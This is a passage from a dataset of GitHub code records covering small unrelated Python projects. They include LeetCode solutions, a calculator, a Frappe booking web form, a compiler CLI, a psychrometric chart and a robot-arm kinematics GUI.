(0.03ms, 10.3MB)\n# 테스트 17 〉\t통과 (0.05ms, 10.3MB)\n\n# 채점 결과\n# 정확성: 17.6\n# 합계: 17.6 / 100.0","repo_name":"namuna309/CodingTestPractice","sub_path":"Programmers/level 2/시소 짝궁/Source(X).py","file_name":"Source(X).py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4041580435","text":"# -*- coding: UTF-8- -*-\n#!/bin/env python3.4\n\n### getting started on features from 'freeling' files\n\nclass Embeddings: \n\n def __init__(self, freeling):\n self.freeling = freeling\n\n def countEmbeddings(self): ### should be highly informative, 'better' speakers should have much more subordination/embedding\n sentences = 0\n subord = 0\n\n for line in self.freeling:\n # for word in line:\n if 'subord' in line:\n subord += 1\n elif 'S_[' in line:\n sentences += 1\n\n if sentences == 0:\n return 0\n\n else:\n return subord/sentences\n\n def getCoordinations(self): ### not sure what will come out of this...\n coordinating = 0\n subordinating = 0\n\n for line in self.freeling:\n if 'conj-subord_[' in line:\n subordinating += 1\n elif 'coord_[' in line:\n coordinating += 1\n\n if coordinating != 0:\n ratio = subordinating/coordinating\n else:\n ratio = 0\n\n return ratio","repo_name":"dwhyatt/automatic-spanish-level-assessment","sub_path":"main/constituency_features.py","file_name":"constituency_features.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"31809643334","text":"class Solution:\n def setZeroes(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n is_row = False\n is_column = False\n\n rows = len(matrix)\n columns = len(matrix[0])\n\n for i in range(rows):\n if matrix[i][0] == 0:\n is_column = True\n\n for j in range(columns):\n if matrix[0][j] == 0:\n is_row = True\n\n for i in range(1, rows):\n for j in range(1, columns):\n if matrix[i][j] == 0:\n matrix[i][0] = 0\n matrix[0][j] = 0\n\n for i in range(1, rows):\n for j in range(1, columns):\n if matrix[i][0] == 0 or matrix[0][j] == 0:\n matrix[i][j] = 0\n\n if is_column:\n for i in range(rows):\n matrix[i][0] = 0\n\n if is_row:\n for j in range(columns):\n matrix[0][j] = 0","repo_name":"vladtenlive/leetcode","sub_path":"youtube/38_matrix_zeroes.py","file_name":"38_matrix_zeroes.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"32"} +{"seq_id":"3032954253","text":"from art import logo\n\n\ndef add(n1, n2):\n return n1 + n2\n\n\ndef sub(n1, n2):\n return n1 - n2\n\n\ndef mult(n1, n2):\n return n1 * n2\n\n\ndef div(n1, n2):\n return n1 / n2\n\n\ndef print_result(num1, operation, num2, result):\n print(f\"{num1} {operation} {num2} = {result}\")\n\n\ndef calculator():\n print(logo)\n result = 0\n\n # if operation == \"+\":\n # result = add(first_num, second_num)\n # elif operation == \"-\":\n # result = sub(first_num, second_num)\n # elif operation == \"*\":\n # result = mult(first_num, second_num)\n # elif operation == \"/\":\n # result = div(first_num, second_num)\n # else:\n # print(\"Invalid Operation\")\n\n # Simplify logic\n operations = {\n \"+\": add,\n \"-\": sub,\n \"*\": mult,\n \"/\": div\n }\n\n first_num = float(input(\"What's the first number?: \"))\n for symbol in operations:\n print(symbol)\n\n continue_with_result = True\n while continue_with_result:\n\n operation = input(\"Pick an operation: \").lower()\n\n second_num = float(input(\"What's the next number?: \"))\n result = operations[operation](first_num, second_num)\n print_result(first_num, operation, second_num, result)\n\n use_result = input(\n f\"Type 'y' to continue calculating with {result}, or type 'n' to start a new calculation: \").lower()\n if use_result == \"exit\":\n return\n\n if use_result == \"y\":\n continue_with_result = True\n first_num = result\n elif use_result == \"n\":\n continue_with_result = False\n calculator()\n else:\n print(\"Invalid input\")\n\n\ncalculator()\n","repo_name":"nreh1r/Calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3010105398","text":"import praw\nimport pprint\n\nuser_agent = \"Karma_Grabber_Test v1 by /u/Gilda_Griffon\"\nr = praw.Reddit(user_agent=user_agent)\nuser = input(\"Enter the user you wish to view a karma breakdown of: \")\nuser = r.get_redditor(user)\n\nthing_limit = 10\ngen = user.get_submitted(limit=thing_limit)\n\nkarma_by_subreddit = {}\nfor thing in gen:\n subreddit = thing.subreddit.display_name\n karma_by_subreddit[subreddit] = (karma_by_subreddit.get(subreddit, 0)\n + thing.score)\n\npprint.pprint(karma_by_subreddit)\n\n\n","repo_name":"hongvan90/PRAW-Project","sub_path":"Karma Breakdown v1.py","file_name":"Karma Breakdown v1.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73367777050","text":"from __future__ import unicode_literals, print_function\n\nimport sys\nimport os\nimport subprocess\n\nfrom src.parse import parse\nfrom src.vm import run\nfrom src.gen import gen\n\ndef shell(command, silent=False):\n '''Run a command and suppress output'''\n if isinstance(command, list):\n command = ' '.join(map(str, command))\n stream = subprocess.PIPE if silent else None\n return subprocess.call(\n command,\n shell=True,\n stdout=stream,\n stderr=stream,\n )\n\ndef die(filename, e):\n '''Print exception and quit'''\n print(\"{}: {}: {}\".format(filename, e.__class__.__name__, e))\n sys.exit(1)\n\ndef getName(filename):\n '''Do the bare minimum to keep the user from overwriting their source\n file.'''\n name, ext = os.path.splitext(os.path.basename(filename))\n if ext != '.hugo':\n raise Exception(\"Expected extension .hugo on filename '{}'.\".format(filename))\n return name\n\ndef checkLLVM():\n '''Check to see if we can use the LLVM backend'''\n error = (\n 'To use LLVM backend, please install Clang, LLVM 3.2, and llvmpy\\n'\n 'See http://www.llvmpy.org/'\n )\n try:\n import llvm\n import llvmpy\n except:\n print(error)\n sys.exit()\n if shell('which llc', silent=True):\n print('Missing llc')\n print(error)\n sys.exit()\n if shell('which clang', silent=True):\n print('Missing clang')\n print(error)\n sys.exit()\n\ndef interpret(options):\n '''Parse and run source file'''\n try:\n maxstack, source = parse(options.filename)\n run(maxstack, source, options.verbose)\n except Exception as e:\n die(options.filename, e)\n\ndef compile(options):\n '''Parse and compile source file to C'''\n try:\n # Parse file into mapping of labels to instructions\n name = getName(options.filename)\n maxstack, source = parse(options.filename)\n\n # Generate and write C source\n cfilename = name + '.c'\n with open(cfilename, 'w') as stream:\n stream.write(gen(maxstack, source))\n\n # Compile using default or specified compiler\n shell([\n options.compiler,\n cfilename,\n options.args if options.args else '-O2 -o{}'.format(name),\n '-DVERBOSE_EXECUTION' if options.verbose else ''\n ])\n except Exception as e:\n die(options.filename, e)\n\ndef llvm(options):\n '''Parse and compile source file to LLVM'''\n checkLLVM()\n from src.genllvm import buildModule\n\n try:\n # Parse file into mapping of labels to instructions\n name = getName(options.filename)\n maxstack, source = parse(options.filename)\n\n # Generate and write LLVM IR\n module = buildModule(name, source, maxstack)\n irFilename = name + '.ll'\n with open(irFilename, 'w') as stream:\n stream.write(str(module))\n\n # Generate assembly with llc\n asmFilename = name + '.s'\n shell([\n 'llc',\n irFilename,\n '-o ' + asmFilename,\n '-O' + options.O,\n ])\n\n # Assemble executable with clang\n # GCC doesn't like the assembly llc produces\n shell([\n 'clang',\n asmFilename,\n '-o ' + name,\n ])\n except Exception as e:\n die(options.filename, e)\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(\n description='Hugo interpreter and compiler',\n )\n\n subparsers = parser.add_subparsers(\n description='Run the Hugo interpreter or compiler',\n help='Available subcommands',\n )\n\n # Subcommand for generating llvm\n llvmparser = subparsers.add_parser(\n 'gen-llvm',\n description='Compile source to LLVM IR and use llc and clang to produce executable',\n help='Compile source to LLVM IR and use llc and clang to produce executable',\n )\n llvmparser.add_argument(\n 'filename',\n metavar='FILENAME',\n help='Source file to compile',\n )\n llvmparser.add_argument(\n '-O',\n choices='0123',\n default='2',\n help='Optimization level for llc. Default is -O2',\n )\n llvmparser.set_defaults(command=llvm)\n\n # Subcommand for compilation\n cparser = subparsers.add_parser(\n 'gen-c',\n description='Compile source to C and use C-compiler to produce executable',\n help='Compile source to C and use C-compiler to produce executable',\n )\n cparser.add_argument(\n 'filename',\n metavar='FILENAME',\n help='Source file to compile',\n )\n cparser.add_argument(\n '--compiler',\n default='clang',\n help='Specify another C-compiler. Default compiler is clang.'\n )\n cparser.add_argument(\n '--args',\n metavar='ARGS',\n default=None,\n help=\"Arguments to pass on to compiler. Default is just '-O2 -oBaseName'\",\n )\n cparser.add_argument(\n '--verbose',\n action='store_true',\n help='Print current expression and stack during execution',\n )\n cparser.set_defaults(command=compile)\n\n # Subcommand for interpretation\n rparser = subparsers.add_parser(\n 'run',\n description='Interpret Hugo source directly',\n help='Interpret Hugo source directly',\n )\n rparser.add_argument(\n 'filename',\n metavar='FILENAME',\n help='Source file to interpret',\n )\n rparser.add_argument(\n '--verbose',\n action='store_true',\n help='Print current expression and stack during execution',\n )\n rparser.set_defaults(command=interpret)\n\n options = parser.parse_args()\n if hasattr(options, 'command'):\n options.command(options)\n else:\n parser.error('Must specify compile or run')\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"cdparks/hugo","sub_path":"hugo.py","file_name":"hugo.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"29925876687","text":"\ndef get_vowel_substrings(txt):\n sov = set()\n for i, x in enumerate(txt):\n if x in 'aeiou':\n for j in range(i, len(txt)):\n if txt[j] in 'aeiou':\n sov.add(txt[i:j+1])\n return sorted(sov)\n \ndef get_consonant_substrings(txt):\n soc = set()\n for i, x in enumerate(txt):\n if x not in 'aeiou':\n for j in range(i, len(txt)):\n if txt[j] not in 'aeiou':\n soc.add(txt[i:j+1])\n return sorted(soc)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"BcjsjPPmPEMQwB86Y_22.py","file_name":"BcjsjPPmPEMQwB86Y_22.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4907851980","text":"from __future__ import unicode_literals\n\nimport frappe\nimport datetime\n\ndef get_context(context):\n\t# do your magic here\n\tpass\n\n@frappe.whitelist(allow_guest=True)\ndef get_stock(slot):\n\tstock = frappe.get_doc(\"Booking Slot\", slot)\n\n\treturn str(stock.available_places)\n\n@frappe.whitelist(allow_guest=True)\ndef get_introduction():\n\treturn frappe.db.get_single_value('Booking Settings', 'booking_form_introduction')\n\n@frappe.whitelist(allow_guest=True)\ndef get_activities():\n\n\treturn frappe.db.sql(\"\"\"\n\t\tselect\tdistinct BS.type \n\t\tfrom `tabBooking Slot` BS\n\t\twhere time_slot > NOW() and show_in_website = 1\n\t\torder by BS.type\"\"\")\n\n@frappe.whitelist(allow_guest=True)\ndef get_slots(activity):\n\n\tif activity:\n\t\tslots = frappe.get_all(\"Booking Slot\",\n\t\t\tfields=[\"name\",\"time_slot_display\",\"type\",\"available_places\",\"total_places\"],\n\t\t\tfilters=[[\"Booking Slot\", \"time_slot\", \">\", datetime.datetime.now()],\n\t\t\t\t\t [\"Booking Slot\", \"show_in_website\", \"=\", 1],\n\t\t\t\t\t [\"Booking Slot\", \"type\", \"=\", activity]],\n\t\t\torder_by=\"time_slot asc\")\n\telse:\n\t\tslots = frappe.get_all(\"Booking Slot\",\n\t\t fields=[\"name\", \"time_slot_display\", \"type\", \"available_places\", \"total_places\"],\n\t\t filters=[[\"Booking Slot\", \"time_slot\", \">\", datetime.datetime.now()],\n\t\t\t\t\t[\"Booking Slot\", \"show_in_website\", \"=\", 1]],\n\t\t order_by=\"time_slot asc\")\n\n\tfor slot in slots:\n\t\tslot['subscription_places'] = slot.get('total_places') \\\n\t\t\t- frappe.db.sql(\"\"\"select COUNT(*) from `tabBooking Subscriber` where parent = %(slot)s\"\"\",\n\t\t\t{\"slot\": slot.get('name')})[0][0]\n\n\treturn slots\n\n@frappe.whitelist(allow_guest=True)\ndef set_notification(slot, email, name):\n\tdoc = frappe.get_doc(\"Booking Slot\", slot)\n\n\t# check if already registered\n\tbooked = frappe.db.sql(\"\"\"select COUNT(*)\n\t from `tabBooking`\n\t where `tabBooking`.slot = %(slot)s and `tabBooking`.email_id = %(email)s\"\"\",\n\t\t\t\t\t\t {\"slot\": slot, \"email\": email})[0][0]\n\n\tbooked += frappe.db.sql(\"\"\"select COUNT(*)\n\t from `tabBooking Subscriber`\n\t inner join `tabCustomer` on `tabBooking Subscriber`.subscriber = tabCustomer.name\n\t inner join `tabDynamic Link` on tabCustomer.name=`tabDynamic Link`.link_name\n\t inner join `tabContact` on `tabDynamic Link`.parent=tabContact.name\n\t where `tabBooking Subscriber`.parent = %(slot)s and `tabContact`.email_id = %(email)s\"\"\",\n\t\t\t\t\t\t\t{\"slot\": slot, \"email\": email})[0][0]\n\n\t# raise error\n\tif booked > 0:\n\t\tfrappe.throw(\"Vous êtes déjà inscrit à cette séance\")\n\telse:\n\n\t\t# check if already on waiting list\n\t\twaiting_list = frappe.db.sql(\"\"\"select COUNT(*)\n\t\t\t from `tabBooking Notification`\n\t\t\t where parent = %(slot)s and email_id = %(email)s\"\"\",\n\t\t\t\t\t {\"slot\": slot, \"email\": email})[0][0]\n\n\t\tif waiting_list > 0:\n\t\t\tfrappe.throw(\"Vous êtes déjà inscrit sur la liste d'attente de cette séance\")\n\t\telse:\n\t\t\tdoc.append(\"notifications\", {\n\t\t\t\t\"email_id\": email,\n\t\t\t\t\"full_name\": name,\n\t\t\t\t\"request_date\": datetime.datetime.now()\n\t\t\t})\n\t\t\tdoc.save()\n","repo_name":"britlog/booking","sub_path":"booking/booking/web_form/class_reservation/class_reservation.py","file_name":"class_reservation.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"25468842589","text":"from pages.fill_form_page import *\nimport unittest\n\n\nclass FillForm(unittest.TestCase):\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=\"/Users/salmanahmad/Downloads/chromedriver\")\n\n def test_fill_form(self):\n self.driver.get(\"https://demoqa.com/text-box\")\n obj = FillFormMethods(self.driver)\n obj.form_fill(form_input_keys, form_input_values)\n obj.click(form_submit_btn_id)\n obj.output_result(output_text_ids)\n print(clean_values)\n self.assertEqual(form_input_values, clean_values, \"Values are not matching - Failed\")\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"salmanahmad21/Automation_Training","sub_path":"POM_version3/tests/fill_form_test.py","file_name":"fill_form_test.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70039857693","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n record = {}\n ans = 0\n tail = -1\n for i, c in enumerate(s):\n if c in record and record[c] > tail:\n tail = record[c]\n record[c] = i\n ans = max(ans, i - tail)\n return ans\n","repo_name":"forewing/lc","sub_path":"python/p3.py","file_name":"p3.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7263014051","text":"import argparse\nimport os\n\nfrom gesture_model import train\n\n\ndef get_args():\n parser = argparse.ArgumentParser(\n description=\"Model training\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n parser.add_argument(\n \"-l\",\n \"--lr\",\n type=float,\n help=\"Learning rate\",\n dest=\"lr\",\n default=0.001\n )\n\n parser.add_argument(\n \"-e\",\n \"--epochs\",\n type=int,\n help=\"Epochs\",\n dest=\"epochs\",\n default=50\n )\n\n parser.add_argument(\n \"-b\",\n \"--batch-size\",\n type=int,\n help=\"Batch size\",\n dest=\"batch_size\",\n default=32\n )\n\n parser.add_argument(\n \"-d\",\n \"--data\",\n type=str,\n help=\"Path to data\",\n dest=\"data_path\"\n )\n\n parser.add_argument(\n \"-c\",\n \"--classes\",\n type=int,\n help=\"Number of classes\",\n dest=\"num_classes\",\n default=10,\n )\n\n parser.add_argument(\n \"-lo\",\n \"--logs\",\n type=str,\n help=\"Path for logs and checkpoints\",\n dest=\"logs_path\",\n default=str(os.path.dirname(__file__)),\n )\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n\n args = get_args()\n train(\n num_classes=args.num_classes,\n learning_rate=args.lr,\n epochs=args.epochs,\n batch_size=args.batch_size,\n data_path=args.data_path,\n logs_path=args.logs_path,\n )\n","repo_name":"chrisgal77/HandController","sub_path":"detector/model/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38303774185","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom CoolProp.HumidAirProp import HAProps\n\nTdb = np.linspace(-10, 55, 100) + 273.15\n\n# Make the figure and the axes\nfig = plt.figure(figsize=(10, 8))\nax = fig.add_axes((0.15, 0.15, 0.8, 0.8))\nax.set_xlim(Tdb[0] - 273.15, Tdb[-1] - 273.15)\nax.set_ylim(0, 0.03)\nax.set_xlabel(r\"Dry bulb temperature [$^{\\circ}$C]\")\nax.set_ylabel(r\"Humidity ratio ($m_{water}/m_{dry\\ air}$) [-]\")\n\n# Saturation line\nw = [HAProps('W', 'T', T, 'P', 101.325, 'R', 1.0) for T in Tdb]\nax.plot(Tdb - 273.15, w, lw=2)\n\n# Humidity lines\nRHValues = [0.05, 0.1, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\nfor RH in RHValues:\n w = [HAProps('W', 'T', T, 'P', 101.325, 'R', RH) for T in Tdb]\n ax.plot(Tdb - 273.15, w, 'r', lw=1)\n\n# Humidity lines\nfor H in [-20, -10, 0, 10, 20, 30, 40, 50, 60, 70, 80, 90]:\n # Line goes from saturation to zero humidity ratio for this enthalpy\n T1 = HAProps('T', 'H', H, 'P', 101.325, 'R', 1.0) - 273.15\n T0 = HAProps('T', 'H', H, 'P', 101.325, 'R', 0.0) - 273.15\n w1 = HAProps('W', 'H', H, 'P', 101.325, 'R', 1.0)\n w0 = HAProps('W', 'H', H, 'P', 101.325, 'R', 0.0)\n ax.plot(np.r_[T1, T0], np.r_[w1, w0], 'r', lw=1)\n\nplt.show()\n","repo_name":"CoolProp/CoolProp","sub_path":"wrappers/Python/CoolProp/GUI/PsychScript.py","file_name":"PsychScript.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":664,"dataset":"github-code","pt":"32"} +{"seq_id":"21493945434","text":"import numpy as np\nimport math\nimport PySimpleGUI as sg\nimport pandas as pd\n\n# GUI Code \n\nsg.theme('DarkTeal6')\n\n# Excel read code\n\nEXCEL_FILE = 'SPHERICAL.xlsx'\ndf = pd.read_excel(EXCEL_FILE)\n\n# Lay out code\n\nMain_layout = [\n [sg.Push(), sg.Text('SPHERICAL MEXE Calculator', font = (\"Agency FB\", 20)), sg.Push()],\n \n [sg.Text('Forward Kinematics calculator', font = (\"Agency FB\", 20))],\n \n [sg.Text('Fill out the following fields:', font = (\"Agency FB\", 15)),\n sg.Push(), sg.Button('Click this before Solving Forward Kinematics',\n font = (\"Agency FB\", 14), size=(30,0), button_color=('white', 'black')), sg.Push(),\n sg.Text('OR', font = (\"Agency FB\",12 )),\n sg.Push(), sg.Button('Solve Inverse Kinematics', font = (\"Agency FB\", 14), size=(30,0), \n button_color=('white', 'black')), sg.Push()],\n\n \n [sg.Text('a1 = ', font = (\"Comic Sans MS\",10)),sg.InputText('3', key='a1', size=(20,10)),\n sg.Text('T1 = ', font = (\"Comic Sans MS\",10)),sg.InputText('90', key='T1', size=(20,10)),\n sg.Push(), sg.Button('Jacobian Matrix (J)', font = (\"Agency FB\", 15), size=(15,0),button_color=('white', 'black')),\n sg.Button('Det(J)', font = (\"Agency FB\", 17), size=(15,0), button_color=('white', 'black')),\n sg.Button('Inverse of J', font = (\"Agency FB\", 17), size=(15,0), button_color=('white', 'black')),\n sg.Button('Transpose of J', font = (\"Agency FB\", 17), size=(15,0), button_color=('white', 'black')),\n sg.Push()],\n\n [sg.Text('a2 = ', font = (\"Comic Sans MS\",10)),sg.InputText('2', key='a2', size=(20,10)),\n sg.Text('T2 = ', font = (\"Comic Sans MS\",10)),sg.InputText('30', key='T2', size=(20,10))],\n \n [sg.Text('a3 = ', font = (\"Comic Sans MS\",10)),sg.InputText('2', key='a3', size=(20,10)),\n sg.Text('d3 = ', font = (\"Comic Sans MS\",10)),\n sg.InputText('5', key='d3', size=(20,10)),],\n \n [sg.Button('Solve Forward Kinematics', tooltip = 'Go first to \"Click this before Solving Forward Kinematics\"!', font = (\"Agency FB\", 15), button_color=('white', 'black')), sg.Push(),\n sg.Push(), \n sg.Button('Path and Trajectory Planning', font = (\"Agency FB\", 18), size=(40,0),\n button_color=('white', 'black')), sg.Push()],\n \n [sg.Frame('Position Vector:',[[\n sg.Text('X = ', font = (\"Agency FB\",10)),sg.InputText(key='X', size=(10,1)),\n sg.Text('Y = ', font = (\"Agency FB\",10)),sg.InputText(key='Y', size=(10,1)),\n sg.Text('Z = ', font = (\"Agency FB\",10)),sg.InputText(key='Z', size=(10,1))]])],\n \n [sg.Push(), sg.Frame('H0_3 Transformation Matrix= ',[[sg.Output(size=(60,12))]]),\n sg.Push(),sg.Image('SPHERICAL.gif'), sg.Push()],\n\n [sg.Submit(font = (\"Agency FB\", 15)),sg.Exit(font = (\"Agency FB\", 15))]\n \n ]\n\n\n# Window Code\nwindow = sg.Window('Spherical Manipulator',Main_layout, resizable=True)\n# Inverse Kinematics Window funciton\ndef Inverse_Kinematics_window():\n sg.theme('DarkTeal6')\n \n EXCEL_FILE = 'SPHERICAL.xlsx'\n IK_df = pd.read_excel(EXCEL_FILE)\n \n IK_layout = [\n [sg.Push(),sg.Text('Inverse Kinematics', font = (\"Century Gothic\", 11)), sg.Push()],\n\n [sg.Text('Please fill out the following fields:', font = (\"Century Gothic\", 9))],\n \n [sg.Text('a1 = ', font = ('Century Gothic', 8)),sg.InputText('0', key='a1', size=(8,10)),\n sg.Text('mm', font = ('Century Gothic', 8)),\n sg.Text('X = ', font = ('Century Gothic', 8)),sg.InputText('0', key='X', size =(8,10)),\n sg.Text('mm', font = ('Century Gothic', 8))],\n \n [sg.Text('a2 = ', font = ('Century Gothic', 8)),sg.InputText('0', key='a2', size=(8,10)),\n sg.Text('mm', font = ('Century Gothic', 8)),\n sg.Text('Y = ', font = ('Century Gothic', 8)),sg.InputText('0', key='Y', size =(8,10)),\n sg.Text('mm', font = ('Century Gothic', 8))],\n \n [sg.Text('a3 = ', font = ('Century Gothic', 8)),sg.InputText('0', key='a3', size=(8,10)),\n sg.Text('mm', font = ('Century Gothic', 8)),\n sg.Text('Z = ', font = ('Century Gothic', 8)),sg.InputText('0', key='Z', size =(8,10)),\n sg.Text('mm', font = ('Century Gothic', 8))],\n \n [sg.Button('Solve Inverse Kinematics', font = ('Impact', 12), size=(47,0), button_color=('#362706', '#E9E5D6'))],\n\n [sg.Frame('Position Vector: ',[[\n sg.Text('Th1 = ', font = ('Century Gothic', 8)),sg.InputText(key='IK_Th1', size =(10,1)),\n sg.Text('degrees', font = ('Century Gothic', 8)),\n \n sg.Text('Th2 = ', font = ('Century Gothic', 8)),sg.InputText(key='IK_Th2', size =(10,1)),\n sg.Text('degrees', font = ('Century Gothic', 8)),\n \n sg.Text('d3 = ', font = ('Century Gothic', 8)),sg.InputText(key='IK_d3', size =(10,1)),\n sg.Text('mm', font = ('Century Gothic', 8)),]])],\n \n [sg.Submit(font = ('Century Gothic', 8), button_color=('#362706', '#E9E5D6')), sg.Exit(font = ('Century Gothic', 8), button_color=('#362706', '#E9E5D6'))]\n \n ]\n \n \n # Window Code\n Inverse_Kinematics_window = sg.Window('Inverse Kinematics', IK_layout)\n \n while True:\n event, values = Inverse_Kinematics_window.read()\n if event == sg.WIN_CLOSED or event == 'Exit':\n break \n\n elif event == 'Solve Inverse Kinematics':\n a1 = float(values['a1'])\n a2 = float(values['a2'])\n a3 = float(values['a3'])\n X = float(values['X'])\n Y = float(values['Y'])\n Z = float(values['Z'])\n ##Inverse Kinematics through Graphical Method\n # Obtaining Theta 1 in degrees\n\n\n #T1\n phi1 = (np.arctan(Y/X))\n r1 = math.sqrt((X**2)+(Y**2))\n Th1= ((phi1)*180.0/np.pi)\n \n\n r2 = Z-a1\n\n\n #Th2\n phi2 = (np.arctan(r2/r1))\n Th2= ((phi2)*180.0/np.pi)\n\n #d3\n d3 = math.sqrt(r1**2+r2**2)-a2-a3\n\n #print(\"Th1=\", np.around(Th1,3))\n\n\n #print(\"Th2=\", np.around(Th2,3))\n \n\n #print(\"d3=\", np.around(d3,3)) \n\n Th1 = Inverse_Kinematics_window['IK_Th1'].Update(np.around(Th1,3))\n Th2 = Inverse_Kinematics_window['IK_Th2'].Update(np.around(Th2,3))\n d3 = Inverse_Kinematics_window['IK_d3'].Update(np.around(d3,3))\n\n elif event == 'Submit':\n IK_df = IK_df.append(values, ignore_index=True)\n IK_df.to_excel(EXCEL_FILE, index=False)\n sg.popup(\"Data saved!\")\n Inverse_Kinematics_window.close()\n \n \n# Variable Codes for disabling button\ndisable_J = window['Jacobian Matrix (J)']\ndisable_DetJ = window['Det(J)'] \ndisable_IV = window['Inverse of J']\ndisable_TJ = window['Transpose of J']\ndisable_PT = window['Path and Trajectory Planning']\n\nwhile True:\n event,values = window.read()\n if event == sg.WIN_CLOSED or event == 'Exit':\n break\n \n elif event == 'Click this before Solving Forward Kinematics':\n disable_J.update(disabled=True)\n disable_DetJ.update(disabled=True)\n disable_IV.update(disabled=True)\n disable_TJ.update(disabled=True)\n disable_PT.update(disabled=True)\n \n \n if event == 'Solve Forward Kinematics':\n # Foward Kinematic Codes \n a1 = float(values['a1'] )\n a2 = float(values['a2'])\n a3 = float(values['a3'])\n \n T1 = float(values['T1'])\n T2 = float(values['T2'])\n d3 = float(values['d3'])\n \n \n T1 = (T1/180.0)*np.pi #Theta 1 in radians\n T2 = (T2/180.0)*np.pi #Theta 2 in radians\n \n \n \n ## D-H Parameter Table (This is the only part you only edit for every new mechanical manipulator.)\n # Rows = no. of HTM, Colums = no. of parameters\n #Theta, alpha, r, d\n \n DHPT = [[(0.0/180.0)*np.pi+T1,(90.0/180.0)*np.pi,0,a1],\n [(90.0/180.0)*np.pi+T2,(90.0/180.0)*np.pi,0,0],\n [(0.0/180.0)*np.pi,(0.0/180)*np.pi,0,a2+a3+d3]]\n \n \n # np.trigo function (DHPT[row][column])\n i = 0\n H0_1 = [[np.cos(DHPT[i][0]),-np.sin(DHPT[i][0])*np.cos(DHPT[i][1]),np.sin(DHPT[i][0])*np.sin(DHPT[i][1]),DHPT[i][2]*np.cos(DHPT[i][0])],\n [np.sin(DHPT[i][0]),np.cos(DHPT[i][0])*np.cos(DHPT[i][1]),-np.cos(DHPT[i][0])*np.sin(DHPT[i][1]),DHPT[i][2]*np.sin(DHPT[i][0])],\n [0,np.sin(DHPT[i][1]),np.cos(DHPT[i][1]),DHPT[i][3]],\n [0,0,0,1]]\n \n i = 1\n H1_2 = [[np.cos(DHPT[i][0]),-np.sin(DHPT[i][0])*np.cos(DHPT[i][1]),np.sin(DHPT[i][0])*np.sin(DHPT[i][1]),DHPT[i][2]*np.cos(DHPT[i][0])],\n [np.sin(DHPT[i][0]),np.cos(DHPT[i][0])*np.cos(DHPT[i][1]),-np.cos(DHPT[i][0])*np.sin(DHPT[i][1]),DHPT[i][2]*np.sin(DHPT[i][0])],\n [0,np.sin(DHPT[i][1]),np.cos(DHPT[i][1]),DHPT[i][3]],\n [0,0,0,1]]\n \n i = 2\n H2_3 = [[np.cos(DHPT[i][0]),-np.sin(DHPT[i][0])*np.cos(DHPT[i][1]),np.sin(DHPT[i][0])*np.sin(DHPT[i][1]),DHPT[i][2]*np.cos(DHPT[i][0])],\n [np.sin(DHPT[i][0]),np.cos(DHPT[i][0])*np.cos(DHPT[i][1]),-np.cos(DHPT[i][0])*np.sin(DHPT[i][1]),DHPT[i][2]*np.sin(DHPT[i][0])],\n [0,np.sin(DHPT[i][1]),np.cos(DHPT[i][1]),DHPT[i][3]],\n [0,0,0,1]]\n \n # Dot Product of H0_3 = H0_1*H1_2*H2_3\n H0_1 = np.matrix(H0_1)\n H0_2 = np.dot(H0_1,H1_2)\n H0_3 = np.dot(H0_2,H2_3)\n \n # Transformation Matrix of the Manipulator\n print(\"H0_3=\")\n print(np.matrix(H0_3))\n \n X0_3 = H0_3[0,3]\n print(\"X = \",X0_3)\n \n Y0_3 = H0_3[1,3]\n print(\"Y = \",Y0_3)\n \n Z0_3 = H0_3[2,3]\n print(\"Z = \",Z0_3)\n\n disable_J.update(disabled=False)\n disable_PT.update(disabled=False)\n \n \n elif event == 'Submit':\n df = df.append(values, ignore_index=True)\n df.to_excel(EXCEL_FILE, index=False)\n sg.popup('Data saved!') \n \n elif event == 'Jacobian Matrix (J)':\n \n Z_1 = [[0],[0],[1]] # The [0,0,1] vector\n Z_0 = [[0],[0],[0]] # The [0,0,0] vector\n # Row 1 - 3, Column 2\n \n J1 = [[1 ,0,0],[0,1,0],[0,0,1]]\n \n J1a =[[0,0,0],[0,0,0],[0,0,0]]\n \n J1 = np.dot(J1,Z_1)\n #print('J1 = ')\n #print(np.matrix(J1)) \n \n J1a_1 = H0_3[0:3,3:]\n J1a_1 = np.matrix(J1a_1)\n #print(J1a_1)\n \n J1a = np.dot(J1a,Z_0)\n #print('J1a = 